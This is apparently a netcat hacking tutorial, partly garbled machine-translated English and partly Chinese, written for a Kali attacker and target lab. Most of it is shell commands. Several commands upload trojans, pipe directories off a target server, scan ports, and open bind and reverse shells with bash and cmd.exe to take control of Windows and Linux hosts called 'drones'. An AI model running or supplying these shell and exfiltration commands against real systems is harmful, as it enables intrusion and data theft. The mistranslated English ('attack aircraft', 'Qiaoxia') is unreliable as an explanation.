Netcat Chinese name: Swiss Army Knife
that there are small stature major functions: with listeners, transfer, telnet, get banner, text file transfer, encryption, remote control, streaming media, remote cloning hard disk.
In almost every install Linux, you simply shell Qiaoxia nc can see if there
nc
Format: nc [parameters] ip port [file]
Parameters:
-v: Detailed
-n: Do not be dns resolve
-l: listening
-p: Port
command execution after disconnection, bonding time: -q
how to upload Trojan nc demo
ubuntu server: execute nc -lp 4444> 1.txt
nc -lp 4444 > 1.txt
kali: performing nc -nv 192.168.176.144 4444 <1.txt
nc -nv 192.168.176.144 4444 < 1.txt -q 1
May
kali: execution: nc -lp 4444 <2.txt -q 1
nc -lp 4444 < 2.txt -q 1
ubuntu server: Execute: nc -nv 192.168.176.129 4444> 2.txt
nc -nv 192.168.176.129 4444 > 2.txt
Transfer directory:
can Tuoku the target server or upload EXP
Kali: implementation of tar -cvf - MITMF / | nc -lp 4444 -q 1
will first be packaged
tar -cvf - MITMF/ | nc -lp 4444 -q 1
ubuntu server: Execute: nc -nv 192.168.176.129 4444 | tar -xvf -
nc -nv 192.168.176.129 4444 | tar -xvf -
Transmission success
ls
加密文件传输
kali 执行:nc -lp 444 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 3.txt
mcrypt是加密软件,–flush是解密后删除,-Fbqd为解密方法,rijndael-256为加密算法,加密方法 -m -ecb
nc -lp 444 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 3.txt
ubuntu服务器:执行mcrypt --flush -Fbq -a rijndael-256 -m ecb < 3.txt | nc -lp 444 ,加密3.txt文件,-Fbq为加密参数
mcrypt --flush -Fbq -a rijndael-256 -m ecb < 3.txt | nc -nv 192.168.176.129 444 -q 1
流媒体服务
kali:执行cat 1.mp4 | nc -lp 4444
cat 1.mp4 | nc -lp 4444
ubuntu服务器:执行:nc -nv 192.168.176.129 4444 | mplayer -vo xll -cache 3000 -
mplayer为视频播放器,以视频流的方式缓存3000字的大小进行播放
nc -nv 192.168.176.129 4444 | mplayer -vo xll -cache 3000 -
NC扫描器
参数:-z:扫描模式,探测开放端口
nc -nvz 192.168.176.145 1-65535
-u:udp端口扫描
nc -nvzu 192.168.176.145 1-1024
远程控制
被控:nc -lp 4444 -c bash
-c:执行bash
正向远程:
nc -lp 4444 -c bash
kali:执行nc -nv 192.168.176.145 4444
nc -nv 192.168.176.145 4444
反向远程
kali:执行 nc -lp 4444
nc -lp 4444
目标服务器:执行:nc -nv 192.168.176.129 4444 -c bash
nc -nv 192.168.176.129 4444 -c bash
如果你要拿下windows的权限
把-c改成-e,bash改成cmd.exe
win7下执行
nc -lp 4444 -e cmd.exe
kali下执行,直接拿到权限
nc -nv 192.168.176.128 4444
The best reverse connection, the target server uses nc -nv attack aircraft ip port -e cmd.exe
and then attack aircraft to monitor the use of open nc -lp port, then perform the above phrase
netcat drawback
1. No authentication, easy to get the drone is connected to others.
2. No encrypted channel, easily arp spoofing, man in the middle attacks, sniffing.